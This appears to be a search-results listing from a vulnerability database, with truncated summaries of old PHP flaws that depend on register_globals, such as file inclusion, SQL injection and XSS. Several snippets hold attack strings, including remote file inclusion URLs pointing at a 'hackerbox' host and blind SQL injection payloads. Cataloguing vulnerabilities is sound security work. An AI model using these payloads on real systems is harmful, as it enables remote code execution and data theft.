19 matches found
phpWebLog <= 0.5.3 Arbitrary File Inclusion
No description provided by source. Example: if register_globals=on and allow_url_fopen=on: http://victim/dir/include/init.inc.php?GPATH=http://hackerbox/ http://victim/dir/backend/addons/links/index.php?PATH=http://hackerbox/ milw0rm.com 2005-03-07...
bilboblog 2.1 - Multiple Vulnerabilities
No description provided by source. Name : Bilboblog 2.1 Multiples Vulnerabilities Description : Bilboblog is a small application of micro-blogging in Php / MySQL Link :...
CVE-2010-1945
Multiple PHP remote file inclusion vulnerabilities in openMairie Openfoncier 2.00, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the pathom parameter to (1) action.class.php, (2) architecte.class.php, (3) avis.class.php, (4) bible.class.php, and (5)...
Eleanor CMS Rc5.1 Cross Site Scripting Vulnerability
Exploit for unknown platform in category web applications. Topic : Eleanor Rc5.1 Bug Type : Cross Site Scripting Credit : ItSecTeam Remote...
MyFusion 6b Local File Inclusion
My Simple Forum 7.1 (LFI) Remote Command Execution Exploit
No description provided by source. #!/usr/bin/perl My Simple Forum v7.1 Remote Command Execution Exploit Apache Log Poisoning/Injection Local File Inclusion at /theme/default/index.template.php?action=lf%00 XSS at /theme/default/index.template.php?Name=XSS - This needs Register Globals ON Credits ...
My Simple Forum 7.1 (LFI) Remote Command Execution Exploit
Exploit for unknown platform in category web applications. #!/usr/bin/perl My Simple Forum v7.1 Remote Command Execution...
PHPLD 3.3 - Blind SQL Injection
phpLD 3.3 Blind SQL Injection http://www.phplinkdirectory.com/ magic_quotes_gpc = Off register_globals = On Vulnerable: GET http://site/phpld/page.php?name= True Request: validpagename' or 1=1 False Request: validpagename' or 1=0 Try this urlencode: validpagename' or...
CVE-2008-4624
PHP remote file inclusion vulnerability in init.php in Fast Click SQL Lite 1.1.7, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the CFGCDIR parameter...
Softpedia SiteXS CMS 0.1.1 Arbitrary File Upload Vulnerability
No description provided by source. SiteXS CMS Remote File Upload Vulnerability Discovered by : Ciph3r E-Mail : [email protected] CMS: sitexs-0.1.1 CMS All Version Vulnerable Download CMS : http://dfn.dl.sourceforge.net/sourceforge/sitexs/sitexs-0.1.1.tar.gz Sp TANX4 : google.com ;...
seagull-063-xss.txt
Product: Seagull STABLE 0.6.3 http://seagullproject.org/ Vulnerable: Seems that none of the theme css renderers sanitize...
NuSEO PHP Enterprise 1.6 Remote File Inclusion Vulnerability
Exploit for unknown platform in category web applications. Vulnerability Type: Remote File Inclusion Vulnerable fil...
PT-2007-5375 · Pluck · Pluck
Name of the Vulnerable Software and Affected Versions: Pluck version 4.3 Description: The issue allows remote attackers to potentially read arbitrary local files via a .. (dot dot) in the file parameter in the data/inc/theme.php file when register_globals is enabled. However, it's noted that the co...
Webfwlog 0.92 - debug.php Remote File Disclosure
D.Script:ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-stable/All/webfwlog-0.92.tbz D.Scrpit:http://webfwlog.sourceforge.net/...
Cahier de texte 2.0 (Database Backup/Source Disclosure) Remote Exploit
Exploit for unknown platform in category web applications. #!/usr/bin/perl INFORMATIONS...
PT-2006-4905 · Php · Phpprintanalyzer
Name of the Vulnerable Software and Affected Versions: phpPrintAnalyzer version 1.1 Description: A remote file inclusion issue in index.php allows remote attackers to execute arbitrary PHP code when register_globals is enabled. This is achieved via a URL in the rep par rapport racine parameter...
PT-2006-3760 · Squirrelmail +1 · Squirrelmail +1
Name of the Vulnerable Software and Affected Versions: SquirrelMail versions 1.4.6 and earlier Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter, under specific conditions where register_globals is enabled and magic_quotes_gpc is...
PT-2006-1804 · Dotproject · Dotproject
Name of the Vulnerable Software and Affected Versions: dotProject versions 2.0.1 and earlier Description: The issue allows remote attackers to execute arbitrary commands via the baseDir parameter in several PHP files, including db adodb.php, db connect.php, session.php, vw usr roles.php,...
PmWiki Multiple Vulnerabilities
This is both a PmWiki and PHP advisory, and works only with register_globals on. I totally missed the PHP GLOBALS GPC injection vulnerability and rediscovered that on my own if just a few months before! arg! Basically in the worst scenario we are in front of two separate vulnerabilities: one regardi...